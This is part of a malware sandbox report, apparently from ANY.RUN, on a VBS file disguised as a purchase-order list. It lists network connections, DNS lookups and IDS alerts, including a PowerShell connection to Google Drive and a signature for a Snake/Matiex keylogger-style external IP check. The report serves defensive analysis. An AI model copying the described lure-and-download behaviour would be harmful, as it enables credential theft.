unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
GET
200
142.250.185.99:80
http://c.pki.goog/r/r1.crl
unknown
whitelisted
GET
200
216.58.212.131:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
whitelisted
GET
200
216.58.212.131:80
http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
5488
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
92.123.104.35:443
www.bing.com
Akamai International B.V.
DE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
6944
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5220
powershell.exe
142.250.186.174:443
drive.google.com
GOOGLE
US
shared

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.206.46
whitelisted
www.bing.com
  • 92.123.104.35
  • 92.123.104.46
  • 92.123.104.33
  • 92.123.104.37
  • 92.123.104.40
  • 92.123.104.34
  • 92.123.104.36
  • 92.123.104.43
  • 92.123.104.32
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
drive.google.com
  • 142.250.186.174
shared
login.live.com
  • 20.190.160.22
  • 40.126.32.138
  • 40.126.32.140
  • 40.126.32.68
  • 40.126.32.72
  • 40.126.32.76
  • 20.190.160.17
  • 40.126.32.134
whitelisted
drive.usercontent.google.com
  • 172.217.18.1
whitelisted
th.bing.com
  • 92.123.104.46
  • 92.123.104.31
  • 92.123.104.34
  • 92.123.104.38
  • 92.123.104.32
  • 92.123.104.33
  • 92.123.104.35
  • 92.123.104.36
  • 92.123.104.47
whitelisted
go.microsoft.com
  • 23.52.121.103
whitelisted

Threats

PID
Process
Class
Message
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Query (checkip .dyndns .org)
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
Misc activity
ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
Device Retrieving External IP Address Detected
ET INFO 404/Snake/Matiex Keylogger Style External IP Check
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
Misc activity
ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
CONSTRUCTORA OBRAS PÚBLICAS SAN EMETERIO S.A ARTÍCULOS EN ORDEN DE COMPRA LISTA ADJUNTA.vbs